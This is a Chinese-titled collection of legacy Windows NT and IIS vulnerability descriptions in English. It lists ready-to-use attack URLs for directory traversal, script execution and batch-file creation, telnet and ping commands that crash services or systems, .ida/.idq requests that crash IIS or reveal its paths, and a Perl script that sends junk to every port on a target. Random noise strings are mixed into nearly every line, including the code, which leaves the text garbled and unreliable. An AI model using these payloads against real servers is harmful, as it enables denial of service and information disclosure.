NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
! e7 B2 P& v2 N% pA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
4 ?/ j3 h2 y3 H9 C) E- U/ A5 t
2 X) C# h! b+ y9 g- ^' r/ tA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
- e; j5 h1 E3 F! f8 G$ T3 J
7 S% N7 d5 f. f, B% `7 Q) \By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

' B5 F. S( q9 }受影響系統(tǒng):4.0
5 `8 K6 C6 a+ W9 t) IA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

If the file 'target.bat' exists, the file will be truncated.
5 t: j0 g8 m2 A/ t+ g

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
' }! E& @( ?6 r% Z4 h# {8 C  o
----------------------------------------------------------------------
" ?+ S2 W* Z; _0 n! h" m$ u
9 I4 q" S3 I) A# y# ?* |1 c受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
- [( `7 v) f' M7 W: Q& S
The following steps;

Telnet to an NT 4.0 system on port 135
8 o2 m4 d* \# p5 E, ^Type about 10 characters followed by a <CR>
Exit Telnet
/ A# t7 l: f( d/ Nresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
0 `4 ]  x: D# G) |. Y, ]9 H
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

# f9 S& {0 t1 e* T+ |' O( N7 MThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
, z4 c' O  Y- c- ^8 t
5 g2 s/ s, I, j1 U. X+ x: jThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/
5 l: A) ~! ?; ?$ z' i2 h) M
. ~* V, C9 h, E7 b' S  k/ {$ {) Muse Socket;
use FileHandle;
require "chat2.pl";

+ o7 o' ]* f9 N1 c) @5 I( K$systemname = $ARGV[0] && shift;
; ?8 ?2 q9 g4 E0 ^! M$ y. c
# K- e7 z7 u3 m  l: t$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{

; J9 B: o' ^4 F# s/ H: N6 R
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
# t: W$ \1 {! y( L5 Q8 Onext;
}
$fh = chat::open_port($systemname, $port);
. g  o, Q- @+ A3 ?2 L" ?+ Lchat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
5 I6 S* b% i+ T* `}
  p" G) u' ~  h8 M! Mchat::close($fh);

}

4 W* r$ n7 r5 J: |
/*end poke code*/
1 ?1 x$ G/ L; O
4 Z, G/ P/ A8 x: D/ O- J6 LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
* i$ p/ P& y" Q+ U" Y  v. D
% t/ R1 J' n5 j% V- z- F# b0 I--------------------------------------------------------------------------------

) k- {  H6 M7 g! X' U受影響系統(tǒng):4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
$ {1 d+ g2 L! A, m
, V0 W# C( e7 Q7 h! BThis attack causes Dr. Watson to display an alert window and to log an error:

9 Z; E  v6 j% V: Q* }) [+ K"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

  N, w% Q) k! e6 i- s! ]0 W--------------------------------------------------------------------------------
0 K+ ]+ T( m. o5 @( |* R& H2 `5 r# s
: C( |/ Y% E6 e3 _! ^4 p受影響系統(tǒng):3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
; y& o/ ~) ]' ?+ b* A+ w
STOP: 0X0000001E
- W7 `  B( [& F6 z7 NKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

* \: U8 I8 Z1 d5 DSTOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
# ]- F5 C  D8 x
/ E4 M( u; `  I3 r( T8 d' C  X! s1 zNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
! q7 s, m  X# O
--------------------------------------------------------------------------------
1 h7 D: Z& d' }8 V% `; X
$ E* l1 ~# @  J8 o1 EMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

. B  g& P, T( h# W--------------------------------------------------------

. `) V3 d, E* \+ c/ ^% AIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server